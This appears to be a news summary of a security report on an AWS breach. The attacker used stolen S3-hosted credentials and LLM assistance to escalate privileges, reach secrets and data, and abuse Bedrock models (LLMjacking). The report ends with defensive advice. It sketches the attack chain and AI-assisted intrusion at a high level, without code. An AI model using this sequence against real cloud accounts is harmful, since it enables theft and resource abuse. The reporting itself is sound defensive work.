A recent security breach on AWS showcases the alarming capabilities of AI-assisted cyberattacks. Researchers observed a digital intruder swiftly gaining administrative access in under 10 minutes, highlighting the growing threat of AI-driven attacks. The Sysdig Threat Research Team noted the attack's speed and the use of large language models (LLMs) for automation, from reconnaissance to malicious code writing and LLMjacking. The threat actor compromised 19 AWS principals, abused Bedrock models, and utilized GPU compute resources, indicating a sophisticated and well-coordinated operation. The attack began with stolen credentials from public Amazon S3 buckets, which contained sensitive data and Retrieval-Augmented Generation (RAG) data for AI models. The attacker's code, written in Serbian, listed IAM users and their access keys, and included comprehensive exception handling. The use of non-existent GitHub repository references and LLM-generated code with Serbian comments further pointed to AI assistance. The intruder then attempted to assume OrganizationAccountAccessRole, including non-victim organization account IDs, a behavior consistent with AI hallucinations. The attacker gained access to sensitive data, including secrets, SSM parameters, CloudWatch logs, and internal data from S3 buckets. The LLMjacking phase involved accessing cloud-hosted LLMs, with the attacker abusing Amazon Bedrock access to invoke multiple models. Sysdig recommends measures such as restricting permissions, enabling logging, and hardening identity security to defend against similar intrusions, emphasizing the need for proactive security measures in the face of evolving AI-driven threats.